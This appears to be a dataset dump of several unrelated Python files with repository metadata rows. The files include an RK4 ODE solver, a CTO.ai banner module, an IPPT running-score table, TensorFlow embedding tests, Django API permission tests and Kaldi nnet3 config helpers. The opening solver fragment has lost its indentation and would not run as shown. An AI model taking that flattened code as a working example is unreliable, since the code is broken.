num = x0
for i in range(n):
num = num + h
listaX.append(num)
for i in range(n):
listaK1.append(expr(listaX[i], listaY[i]))
listaK2.append(expr(listaX[i] + h/2, listaY[i] + (h/2)*listaK1[i]))
listaK3.append(expr(listaX[i] + h/2, listaY[i] + (h/2)*listaK2[i]))
listaK4.append(expr(listaX[i] + h, listaY[i] + h*listaK3[i]))
listaY.append(listaY[len(listaY)-1] + (h/6) * (listaK1[len(listaK1)-1] + 2*listaK2[len(listaK2)-1] + 2*listaK3[len(listaK3)-1] + listaK4[len(listaK4)-1]))
listaK1.append("-")
listaK2.append("-")
listaK3.append("-")
listaK4.append("-")
def g(y_0, xs):
return expr(xs,y_0)
w = odeint(g, y0,listaX)
for i in range(len(listaY)):
listaErr.append(abs(w[i][0] - listaY[i]))
Table = PrettyTable()
ks = []
i = 0
while(len(ks) < n + 1):
ks.append(i)
i+=1
Table.add_column("i", ks)
Table.add_column("X", listaX)
Table.add_column("K1", listaK1)
Table.add_column("K2", listaK2)
Table.add_column("K3", listaK3)
Table.add_column("K4", listaK4)
Table.add_column("Y", listaY)
Table.add_column("Erro", listaErr)
print(Table)
def graficork4(f, a, b, x0, y0, n):
expr = lambdify([x, y], f)
h = (b - a) / n
listaX = [x0]
listaY = [y0]
listaK1 = []
listaK2 = []
listaK3 = []
listaK4 = []
num = x0
for i in range(n):
num = num + h
listaX.append(num)
for i in range(n):
listaK1.append(expr(listaX[i], listaY[i]))
listaK2.append(expr(listaX[i] + h/2, listaY[i] + (h/2)*listaK1[i]))
listaK3.append(expr(listaX[i] + h/2, listaY[i] + (h/2)*listaK2[i]))
listaK4.append(expr(listaX[i] + h, listaY[i] + h*listaK3[i]))
listaY.append(listaY[len(listaY)-1] + (h/6) * (listaK1[len(listaK1)-1] + 2*listaK2[len(listaK2)-1] + 2*listaK3[len(listaK3)-1] + listaK4[len(listaK4)-1]))
listaK1.append("-")
listaK2.append("-")
listaK3.append("-")
listaK4.append("-")
def g(y_0, xs):
return expr(xs, y_0)
z = np.arange(x0, listaX[len(listaX)-1]+0.001, 0.001)
w = odeint(g, y0, z)
c = []
for i in range(len(w)):
c.append(float(w[i]))
fig = go.Figure()
fig.add_trace(go.Scatter(x=z,y=c, name='Solução Exata'))
fig.add_trace(go.Scatter(x=listaX, y=listaY, name="Estimativa", mode="markers"))
fig.show()
# def f(x,y): return y-x
# def f(x,y): return x - y + 2
# eulermethodf(f(x,y), 0, 1, 0, 2, 4)
# graficoeuler(f(x,y), 0, 1, 0, 2, 4)
# eulermethod(f(x,y), 0, 1, 0, 2, 4)
# rk2(f(x,y), 0, 1, 0, 2, 5)
# graficork2(f(x,y), 0, 1, 0, 2, 5)
# rk4(f(x,y), 0, 1, 0, 2, 5)
# graficork4(f(x,y), 0, 1, 0, 2, 5)
| 26.82197
| 162
| 0.543285
| 1,134
| 7,081
| 3.357143
| 0.077601
| 0.044129
| 0.077226
| 0.057788
| 0.914368
| 0.903599
| 0.903599
| 0.903599
| 0.888889
| 0.888889
| 0
| 0.049463
| 0.263381
| 7,081
| 264
| 163
| 26.82197
| 0.680406
| 0.039542
| 0
| 0.922374
| 0
| 0
| 0.020465
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.059361
| false
| 0
| 0.031963
| 0.027397
| 0.118721
| 0.018265
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f49d420720937d33e66e7ed9f1b0b7747b81e1b4
| 146
|
py
|
Python
|
stko/calculators/extractors/__init__.py
|
stevenbennett96/stk_optimizers-1
|
c31b8b422df43f67bef265acadd0a6de500fbfc0
|
[
"MIT"
] | null | null | null |
stko/calculators/extractors/__init__.py
|
stevenbennett96/stk_optimizers-1
|
c31b8b422df43f67bef265acadd0a6de500fbfc0
|
[
"MIT"
] | null | null | null |
stko/calculators/extractors/__init__.py
|
stevenbennett96/stk_optimizers-1
|
c31b8b422df43f67bef265acadd0a6de500fbfc0
|
[
"MIT"
] | null | null | null |
from .extractor import * # noqa
from .xtb_extractor import * # noqa
from .orca_extractor import * # noqa
from .cp2k_extractor import * # noqa
| 29.2
| 37
| 0.726027
| 19
| 146
| 5.421053
| 0.368421
| 0.582524
| 0.737864
| 0.669903
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008475
| 0.191781
| 146
| 4
| 38
| 36.5
| 0.864407
| 0.130137
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
f4e2e4144ff89fdc6788b7dc34ce53a6f4c4ea6b
| 3,529
|
py
|
Python
|
init_repo/logos.py
|
cto-ai/repo
|
6b2c8a8db4715ba6681dbd1735c919fce79acfea
|
[
"MIT"
] | 3
|
2020-04-25T14:45:51.000Z
|
2020-05-25T22:22:38.000Z
|
init_repo/logos.py
|
cto-ai/repo
|
6b2c8a8db4715ba6681dbd1735c919fce79acfea
|
[
"MIT"
] | 1
|
2020-03-06T18:52:06.000Z
|
2020-03-06T18:52:06.000Z
|
init_repo/logos.py
|
cto-ai/repo
|
6b2c8a8db4715ba6681dbd1735c919fce79acfea
|
[
"MIT"
] | null | null | null |
from cto_ai import sdk, ux
cto_terminal = """
[94m██████[39m[33m╗[39m [94m████████[39m[33m╗[39m [94m██████[39m[33m╗ [39m [94m█████[39m[33m╗[39m [94m██[39m[33m╗[39m
[94m██[39m[33m╔════╝[39m [33m╚══[39m[94m██[39m[33m╔══╝[39m [94m██[39m[33m╔═══[39m[94m██[39m[33m╗[39m [94m██[39m[33m╔══[39m[94m██[39m[33m╗[39m [94m██[39m[33m║[39m
[94m██[39m[33m║ [39m [94m ██[39m[33m║ [39m [94m██[39m[33m║[39m[94m ██[39m[33m║[39m [94m███████[39m[33m║[39m [94m██[39m[33m║[39m
[94m██[39m[33m║ [39m [94m ██[39m[33m║ [39m [94m██[39m[33m║[39m[94m ██[39m[33m║[39m [94m██[39m[33m╔══[39m[94m██[39m[33m║[39m [94m██[39m[33m║[39m
[33m╚[39m[94m██████[39m[33m╗[39m [94m ██[39m[33m║ [39m [33m╚[39m[94m██████[39m[33m╔╝[39m [94m██[39m[33m╗[39m [94m██[39m[33m║[39m[94m ██[39m[33m║[39m [94m██[39m[33m║[39m
[33m ╚═════╝[39m [33m ╚═╝ [39m [33m ╚═════╝ [39m [33m╚═╝[39m [33m╚═╝ ╚═╝[39m [33m╚═╝[39m
We’re building the world’s best developer experiences.
"""
cto_slack = """:white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square:
:white_square::white_square::black_square::black_square::white_square::white_square::black_square::black_square::black_square::white_square::white_square::white_square::black_square::black_square::black_square::white_square:
:white_square::black_square::white_square::white_square::black_square::white_square::black_square::white_square::white_square::black_square::white_square::black_square::white_square::white_square::white_square::white_square:
:white_square::black_square::white_square::white_square::black_square::white_square::black_square::black_square::black_square::white_square::white_square::white_square::black_square::black_square::white_square::white_square:
:white_square::black_square::white_square::white_square::black_square::white_square::black_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square::black_square::white_square:
:white_square::white_square::black_square::black_square::white_square::white_square::black_square::white_square::white_square::white_square::white_square::black_square::black_square::black_square::white_square::white_square:
:white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square::white_square:"""
intro = """👋 Hi there! Welcome to the CTO.ai Repo Op!
This Op will allow you to create, delete, and archive remote repositories on GitHub, GitLab, and Bitbucket. \n
❓ How does it work?
You will be prompted for your version control platform of choice, the appropriate credentials, and the target repo. \n
ℹ️ Prerequisites
This Op will require personal access tokens with the following permission scopes:
🔑 GitHub: repo, delete_repo - https://github.com/settings/tokens/
🔑 GitLab: api, read_user, read_repository, write_repository, read_registry - https://gitlab.com/profile/personal_access_tokens
For more information, see the README. \n"""
def logo_print():
if sdk.get_interface_type() == 'terminal':
ux.print(cto_terminal)
else:
ux.print(cto_slack)
| 88.225
| 239
| 0.694531
| 665
| 3,529
| 3.986466
| 0.177444
| 0.340249
| 0.519427
| 0.514523
| 0.710675
| 0.700113
| 0.700113
| 0.675971
| 0.675971
| 0.675971
| 0
| 0.090375
| 0.084443
| 3,529
| 39
| 240
| 90.487179
| 0.628907
| 0
| 0
| 0
| 0
| 0.516129
| 0.938209
| 0.626701
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032258
| false
| 0
| 0.032258
| 0
| 0.064516
| 0.096774
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
762f43a45709e4aca6638fe5ab5a90eec01f00ef
| 202
|
py
|
Python
|
src/deepmem/__init__.py
|
mihirkatare/DeepMEM
|
6aadf3eece908a73db3399e1389990e392f3a282
|
[
"Apache-2.0"
] | 2
|
2021-06-02T15:56:40.000Z
|
2021-06-02T16:02:21.000Z
|
src/deepmem/__init__.py
|
mihirkatare/DeepMEM
|
6aadf3eece908a73db3399e1389990e392f3a282
|
[
"Apache-2.0"
] | 15
|
2021-06-04T02:05:45.000Z
|
2021-10-18T07:05:47.000Z
|
src/deepmem/__init__.py
|
mihirkatare/DeepMEM
|
6aadf3eece908a73db3399e1389990e392f3a282
|
[
"Apache-2.0"
] | null | null | null |
from deepmem import data, model, networks, utils
from deepmem._version import version as __version__
__all__ = ["__version__", "data", "model", "networks", "utils"]
def __dir__():
return __all__
| 22.444444
| 63
| 0.727723
| 24
| 202
| 5.25
| 0.541667
| 0.174603
| 0.269841
| 0.349206
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153465
| 202
| 8
| 64
| 25.25
| 0.736842
| 0
| 0
| 0
| 0
| 0
| 0.163366
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0.4
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
521db984018f2987acd05d7c8724a41e52747cb0
| 10,681
|
py
|
Python
|
calculator/data/run.py
|
ninest/IPPT
|
5fa8ac4156156e5a97b6d99b7055b5e6b1aee4aa
|
[
"MIT"
] | 4
|
2020-10-15T05:30:50.000Z
|
2022-03-22T17:03:12.000Z
|
calculator/data/run.py
|
ninest/IPPT
|
5fa8ac4156156e5a97b6d99b7055b5e6b1aee4aa
|
[
"MIT"
] | 1
|
2020-09-11T16:22:38.000Z
|
2020-10-12T07:47:14.000Z
|
calculator/data/run.py
|
ninest/IPPT
|
5fa8ac4156156e5a97b6d99b7055b5e6b1aee4aa
|
[
"MIT"
] | null | null | null |
running_score_table = [
[
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
1,
2,
4,
6,
8,
10,
12,
14,
16,
18,
19,
20,
21,
22,
23,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
35,
36,
36,
37,
37,
38,
38,
39,
39,
40,
40,
41,
42,
43,
44,
46,
48,
49,
50,
],
[
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
1,
2,
4,
6,
8,
10,
12,
14,
16,
18,
19,
20,
21,
22,
23,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
35,
36,
36,
37,
37,
38,
38,
39,
39,
40,
40,
41,
42,
43,
44,
46,
48,
49,
50,
50,
],
[
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
1,
2,
4,
6,
8,
10,
12,
14,
16,
18,
19,
20,
21,
22,
23,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
35,
36,
36,
37,
37,
38,
38,
39,
39,
40,
40,
41,
42,
43,
44,
46,
48,
49,
50,
50,
50,
],
[
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
1,
2,
4,
6,
8,
10,
12,
14,
16,
18,
19,
20,
21,
22,
23,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
35,
36,
36,
37,
37,
38,
38,
39,
39,
40,
41,
42,
43,
44,
45,
46,
48,
49,
50,
50,
50,
50,
],
[
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
1,
2,
4,
6,
8,
10,
12,
14,
16,
18,
19,
20,
21,
22,
23,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
35,
36,
36,
37,
37,
38,
38,
39,
39,
40,
41,
42,
43,
44,
45,
46,
48,
49,
50,
50,
50,
50,
50,
],
[
0,
0,
0,
0,
0,
0,
0,
0,
0,
1,
2,
4,
6,
8,
10,
12,
14,
16,
18,
20,
21,
22,
23,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
35,
36,
36,
37,
37,
38,
38,
39,
39,
40,
40,
41,
42,
43,
44,
45,
46,
48,
49,
50,
50,
50,
50,
50,
50,
],
[
0,
0,
0,
0,
0,
0,
0,
0,
1,
2,
4,
6,
8,
10,
12,
14,
16,
18,
20,
22,
23,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
35,
35,
36,
36,
37,
37,
38,
38,
39,
39,
40,
40,
41,
42,
43,
44,
45,
46,
48,
49,
50,
50,
50,
50,
50,
50,
50,
],
[
0,
0,
0,
0,
0,
0,
0,
1,
2,
4,
6,
8,
10,
12,
14,
16,
18,
20,
22,
23,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
35,
35,
36,
36,
37,
37,
38,
38,
39,
39,
40,
40,
41,
42,
43,
44,
45,
46,
48,
49,
50,
50,
50,
50,
50,
50,
50,
50,
],
[
0,
0,
0,
0,
0,
0,
1,
2,
4,
6,
8,
10,
12,
14,
16,
18,
20,
22,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
35,
35,
36,
36,
37,
37,
38,
38,
39,
39,
40,
40,
41,
42,
43,
44,
45,
46,
47,
48,
49,
50,
50,
50,
50,
50,
50,
50,
50,
50,
],
[
0,
0,
0,
0,
0,
1,
2,
4,
6,
8,
10,
12,
14,
16,
18,
20,
22,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
35,
35,
36,
36,
37,
37,
38,
38,
39,
39,
40,
40,
41,
42,
43,
44,
45,
46,
47,
48,
49,
50,
50,
50,
50,
50,
50,
50,
50,
50,
50,
],
[
0,
0,
0,
0,
1,
2,
4,
6,
8,
10,
12,
14,
16,
18,
20,
22,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
35,
35,
36,
36,
37,
37,
38,
38,
39,
39,
40,
40,
41,
42,
43,
44,
45,
46,
47,
48,
49,
50,
50,
50,
50,
50,
50,
50,
50,
50,
50,
50,
],
[
0,
0,
0,
1,
2,
4,
6,
8,
10,
12,
14,
16,
18,
20,
22,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
35,
35,
36,
36,
37,
37,
38,
38,
39,
39,
40,
40,
41,
42,
43,
44,
45,
46,
47,
48,
49,
50,
50,
50,
50,
50,
50,
50,
50,
50,
50,
50,
50,
],
[
0,
0,
1,
2,
4,
6,
8,
10,
12,
14,
16,
18,
20,
22,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
35,
35,
36,
36,
37,
37,
38,
38,
39,
39,
40,
40,
41,
42,
43,
44,
45,
46,
47,
48,
49,
50,
50,
50,
50,
50,
50,
50,
50,
50,
50,
50,
50,
50,
],
[
0,
1,
2,
4,
6,
8,
10,
12,
14,
16,
18,
20,
22,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
35,
35,
36,
36,
37,
37,
38,
38,
39,
39,
40,
40,
41,
42,
43,
44,
45,
46,
47,
48,
49,
50,
50,
50,
50,
50,
50,
50,
50,
50,
50,
50,
50,
50,
50,
],
]
run_times = [
1100,
1090,
1080,
1070,
1060,
1050,
1040,
1030,
1020,
1010,
1000,
990,
980,
970,
960,
950,
940,
930,
920,
910,
900,
890,
880,
870,
860,
850,
840,
830,
820,
810,
800,
790,
780,
770,
760,
750,
740,
730,
720,
710,
700,
690,
680,
670,
660,
650,
640,
630,
620,
610,
600,
590,
580,
570,
560,
550,
540,
530,
520,
510,
]
| 11.43576
| 23
| 0.161408
| 905
| 10,681
| 1.901657
| 0.119337
| 0.105752
| 0.135967
| 0.153399
| 0.874492
| 0.874492
| 0.874492
| 0.874492
| 0.874492
| 0.874492
| 0
| 0.634731
| 0.749836
| 10,681
| 933
| 24
| 11.448017
| 0.009356
| 0
| 0
| 0.916309
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
528cc5943a8a10aa3b8f479a33e88f6efe84c3cd
| 2,425
|
py
|
Python
|
tests/inferbeddings/model/test_embeddings.py
|
issca/inferbeddings
|
80492a7aebcdcac21e758514c8af403d77e8594a
|
[
"MIT"
] | 33
|
2017-07-25T14:31:00.000Z
|
2019-03-06T09:18:00.000Z
|
tests/inferbeddings/model/test_embeddings.py
|
issca/inferbeddings
|
80492a7aebcdcac21e758514c8af403d77e8594a
|
[
"MIT"
] | 1
|
2017-08-22T13:49:30.000Z
|
2017-08-22T13:49:30.000Z
|
tests/inferbeddings/model/test_embeddings.py
|
issca/inferbeddings
|
80492a7aebcdcac21e758514c8af403d77e8594a
|
[
"MIT"
] | 9
|
2017-10-05T08:50:45.000Z
|
2019-04-18T12:40:56.000Z
|
# -*- coding: utf-8 -*-
import pytest
import numpy as np
import tensorflow as tf
import inferbeddings.models.embeddings as embeddings
def test_additive_walk_embedding():
batch_size = 5
embedding_size = 10
walk_length = 3
rs = np.random.RandomState(0)
P = rs.rand(batch_size, walk_length, embedding_size)
vP = tf.Variable(P, name='P')
vW = embeddings.additive_walk_embedding(vP)
init_op = tf.global_variables_initializer()
with tf.Session() as session:
session.run(init_op)
swe = session.run(vW)
assert(swe.shape[0] == batch_size)
assert(np.allclose(swe, np.sum(P, axis=1)))
tf.reset_default_graph()
def test_additive_walk_embedding_zeros():
batch_size = 5
embedding_size = 10
walk_length = 0
rs = np.random.RandomState(0)
P = rs.rand(batch_size, walk_length, embedding_size)
vP = tf.Variable(P, name='P')
vW = embeddings.additive_walk_embedding(vP)
init_op = tf.global_variables_initializer()
with tf.Session() as session:
session.run(init_op)
swe = session.run(vW)
assert(swe.shape[0] == batch_size)
assert(np.allclose(swe, np.sum(P, axis=1)))
tf.reset_default_graph()
def test_bilinear_diagonal_walk_embedding():
batch_size = 5
embedding_size = 10
walk_length = 3
rs = np.random.RandomState(0)
P = rs.rand(batch_size, walk_length, embedding_size)
vP = tf.Variable(P, name='P')
vW = embeddings.bilinear_diagonal_walk_embedding(vP)
init_op = tf.global_variables_initializer()
with tf.Session() as session:
session.run(init_op)
swe = session.run(vW)
assert(swe.shape[0] == batch_size)
assert(np.allclose(swe, np.prod(P, axis=1)))
tf.reset_default_graph()
def test_bilinear_walk_embedding():
batch_size = 1
embedding_size = 25
walk_length = 1
rs = np.random.RandomState(0)
P = rs.rand(batch_size, walk_length, embedding_size)
vP = tf.Variable(P, name='P')
vW = embeddings.bilinear_walk_embedding(vP, int(np.sqrt(embedding_size)))
init_op = tf.global_variables_initializer()
with tf.Session() as session:
session.run(init_op)
swe = session.run(vW)
assert(swe.shape[0] == batch_size)
assert(np.allclose(swe, P.reshape(1, 5, 5)))
tf.reset_default_graph()
if __name__ == '__main__':
pytest.main([__file__])
| 24.25
| 77
| 0.664742
| 345
| 2,425
| 4.417391
| 0.182609
| 0.070866
| 0.055118
| 0.055118
| 0.822835
| 0.799213
| 0.799213
| 0.799213
| 0.776247
| 0.776247
| 0
| 0.016324
| 0.216907
| 2,425
| 99
| 78
| 24.494949
| 0.786203
| 0.00866
| 0
| 0.727273
| 0
| 0
| 0.004996
| 0
| 0
| 0
| 0
| 0
| 0.121212
| 1
| 0.060606
| false
| 0
| 0.060606
| 0
| 0.121212
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bfdcd366c8ea993353b0692302c7534694c0b448
| 6,682
|
py
|
Python
|
rdmo/projects/tests/test_viewset_project_integration.py
|
cbittner/rdmo
|
1d6885ad2a69f6d24c9fca6446536e0c06de5486
|
[
"Apache-2.0"
] | null | null | null |
rdmo/projects/tests/test_viewset_project_integration.py
|
cbittner/rdmo
|
1d6885ad2a69f6d24c9fca6446536e0c06de5486
|
[
"Apache-2.0"
] | null | null | null |
rdmo/projects/tests/test_viewset_project_integration.py
|
cbittner/rdmo
|
1d6885ad2a69f6d24c9fca6446536e0c06de5486
|
[
"Apache-2.0"
] | null | null | null |
import json
import pytest
from django.urls import reverse
from ..models import Integration
users = (
('owner', 'owner'),
('manager', 'manager'),
('author', 'author'),
('guest', 'guest'),
('api', 'api'),
('user', 'user'),
('site', 'site'),
('anonymous', None),
)
status_map = {
'list': {
'owner': 200, 'manager': 200, 'author': 404, 'guest': 404, 'api': 200, 'user': 404, 'site': 200, 'anonymous': 404
},
'detail': {
'owner': 200, 'manager': 200, 'author': 404, 'guest': 404, 'api': 200, 'user': 404, 'site': 200, 'anonymous': 404
},
'create': {
'owner': 201, 'manager': 201, 'author': 404, 'guest': 404, 'api': 201, 'user': 404, 'site': 201, 'anonymous': 404
},
'update': {
'owner': 200, 'manager': 200, 'author': 404, 'guest': 404, 'api': 200, 'user': 404, 'site': 200, 'anonymous': 404
},
'delete': {
'owner': 204, 'manager': 204, 'author': 404, 'guest': 404, 'api': 204, 'user': 404, 'site': 204, 'anonymous': 404
}
}
urlnames = {
'list': 'v1-projects:project-integration-list',
'detail': 'v1-projects:project-integration-detail'
}
site_id = 1
project_id = 1
@pytest.mark.parametrize('username,password', users)
def test_list(db, client, username, password):
client.login(username=username, password=password)
url = reverse(urlnames['list'], args=[project_id])
response = client.get(url)
assert response.status_code == status_map['list'][username], response.json()
if response.status_code == 200:
assert isinstance(response.json(), list)
assert len(response.json()) == 1
@pytest.mark.parametrize('username,password', users)
def test_detail(db, client, username, password):
client.login(username=username, password=password)
instances = Integration.objects.filter(project_id=project_id)
for instance in instances:
url = reverse(urlnames['detail'], args=[project_id, instance.pk])
response = client.get(url)
assert response.status_code == status_map['detail'][username], response.json()
if response.status_code == 200:
assert response.json().get('id') == instance.id
@pytest.mark.parametrize('username,password', users)
def test_create(db, client, username, password):
client.login(username=username, password=password)
url = reverse(urlnames['list'], args=[project_id])
data = {
'provider_key': 'github',
'options': [
{
'key': 'repo',
'value': 'example/example'
}
]
}
response = client.post(url, data=json.dumps(data), content_type="application/json")
assert response.status_code == status_map['create'][username], response.json()
@pytest.mark.parametrize('username,password', users)
def test_create_error1(db, client, username, password):
client.login(username=username, password=password)
url = reverse(urlnames['list'], args=[project_id])
data = {
'provider_key': 'wrong',
'options': [
{
'key': 'repo',
'value': 'example/example'
}
]
}
response = client.post(url, data=json.dumps(data), content_type="application/json")
if status_map['create'][username] == 201:
assert response.status_code == 400, response.json()
assert response.json()['provider_key'], response.json()
else:
assert response.status_code == status_map['create'][username], response.json()
@pytest.mark.parametrize('username,password', users)
def test_create_error2(db, client, username, password):
client.login(username=username, password=password)
url = reverse(urlnames['list'], args=[project_id])
data = {
'provider_key': 'github',
'options': [
{
'key': 'repo',
'value': ''
}
]
}
response = client.post(url, data=json.dumps(data), content_type="application/json")
if status_map['create'][username] == 201:
assert response.status_code == 400, response.json()
assert response.json()['options'][0]['value'], response.json()
else:
assert response.status_code == status_map['create'][username], response.json()
@pytest.mark.parametrize('username,password', users)
def test_create_error3(db, client, username, password):
client.login(username=username, password=password)
url = reverse(urlnames['list'], args=[project_id])
data = {
'provider_key': 'github',
'options': [
{
'key': 'repo',
'value': 'example/example'
},
{
'key': 'foo',
'value': 'bar'
}
]
}
response = client.post(url, data=json.dumps(data), content_type="application/json")
if status_map['create'][username] == 201:
assert response.status_code == 400, response.json()
assert 'foo' in response.json()['options'][0], response.json()
else:
assert response.status_code == status_map['create'][username], response.json()
@pytest.mark.parametrize('username,password', users)
def test_update(db, client, username, password):
client.login(username=username, password=password)
instances = Integration.objects.filter(project_id=project_id)
for instance in instances:
url = reverse(urlnames['detail'], args=[project_id, instance.pk])
data = {
'provider_key': 'github',
'options': [
{
'key': 'repo',
'value': 'example/test'
}
]
}
response = client.put(url, data, content_type='application/json')
assert response.status_code == status_map['update'][username], response.json()
if response.status_code == 200:
assert sorted(response.json().get('options'), key=lambda obj: obj['key']) == [
{
'key': 'repo',
'value': 'example/test'
},
{
'key': 'secret',
'value': ''
}
]
@pytest.mark.parametrize('username,password', users)
def test_delete(db, client, username, password):
client.login(username=username, password=password)
instances = Integration.objects.filter(project_id=project_id)
for instance in instances:
url = reverse(urlnames['detail'], args=[project_id, instance.pk])
response = client.delete(url)
assert response.status_code == status_map['delete'][username], response.content
| 32.436893
| 121
| 0.586501
| 707
| 6,682
| 5.452617
| 0.12447
| 0.099611
| 0.06537
| 0.068482
| 0.816861
| 0.799481
| 0.799481
| 0.790143
| 0.777432
| 0.6869
| 0
| 0.031444
| 0.252769
| 6,682
| 205
| 122
| 32.595122
| 0.740637
| 0
| 0
| 0.488095
| 0
| 0
| 0.158785
| 0.011075
| 0
| 0
| 0
| 0
| 0.107143
| 1
| 0.047619
| false
| 0.142857
| 0.02381
| 0
| 0.071429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
87323a1c3e19e57023590d72ab84e2d8fba6ed7d
| 23,058
|
py
|
Python
|
egs/wsj/s5/steps/nnet3/components.py
|
mnjagtap/Kaldi-branch
|
b4780574cf18f29fb9851826d0645370e08d6121
|
[
"Apache-2.0"
] | 32
|
2016-11-30T04:51:29.000Z
|
2021-06-13T09:16:59.000Z
|
egs/wsj/s5/steps/nnet3/components.py
|
mnjagtap/Kaldi-branch
|
b4780574cf18f29fb9851826d0645370e08d6121
|
[
"Apache-2.0"
] | null | null | null |
egs/wsj/s5/steps/nnet3/components.py
|
mnjagtap/Kaldi-branch
|
b4780574cf18f29fb9851826d0645370e08d6121
|
[
"Apache-2.0"
] | 10
|
2016-07-12T12:39:57.000Z
|
2021-08-31T03:00:23.000Z
|
#!/usr/bin/env python
from __future__ import print_function
import os
import argparse
import sys
import warnings
import copy
# adds the input nodes and returns the descriptor
def AddInputLayer(config_lines, feat_dim, splice_indexes=[0], ivector_dim=0):
components = config_lines['components']
component_nodes = config_lines['component-nodes']
output_dim = 0
components.append('input-node name=input dim=' + str(feat_dim))
list = [('Offset(input, {0})'.format(n) if n != 0 else 'input') for n in splice_indexes]
output_dim += len(splice_indexes) * feat_dim
if ivector_dim > 0:
components.append('input-node name=ivector dim=' + str(ivector_dim))
list.append('ReplaceIndex(ivector, t, 0)')
output_dim += ivector_dim
splice_descriptor = "Append({0})".format(", ".join(list))
print(splice_descriptor)
return {'descriptor': splice_descriptor,
'dimension': output_dim}
def AddLdaLayer(config_lines, name, input, lda_file):
components = config_lines['components']
component_nodes = config_lines['component-nodes']
components.append('component name={0}_lda type=FixedAffineComponent matrix={1}'.format(name, lda_file))
component_nodes.append('component-node name={0}_lda component={0}_lda input={1}'.format(name, input['descriptor']))
return {'descriptor': '{0}_lda'.format(name),
'dimension': input['dimension']}
def AddAffineLayer(config_lines, name, input, output_dim, ng_affine_options = ""):
components = config_lines['components']
component_nodes = config_lines['component-nodes']
components.append("component name={0}_affine type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3}".format(name, input['dimension'], output_dim, ng_affine_options))
component_nodes.append("component-node name={0}_affine component={0}_affine input={1}".format(name, input['descriptor']))
return {'descriptor': '{0}_affine'.format(name),
'dimension': output_dim}
def AddAffRelNormLayer(config_lines, name, input, output_dim, ng_affine_options = ""):
components = config_lines['components']
component_nodes = config_lines['component-nodes']
components.append("component name={0}_affine type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3}".format(name, input['dimension'], output_dim, ng_affine_options))
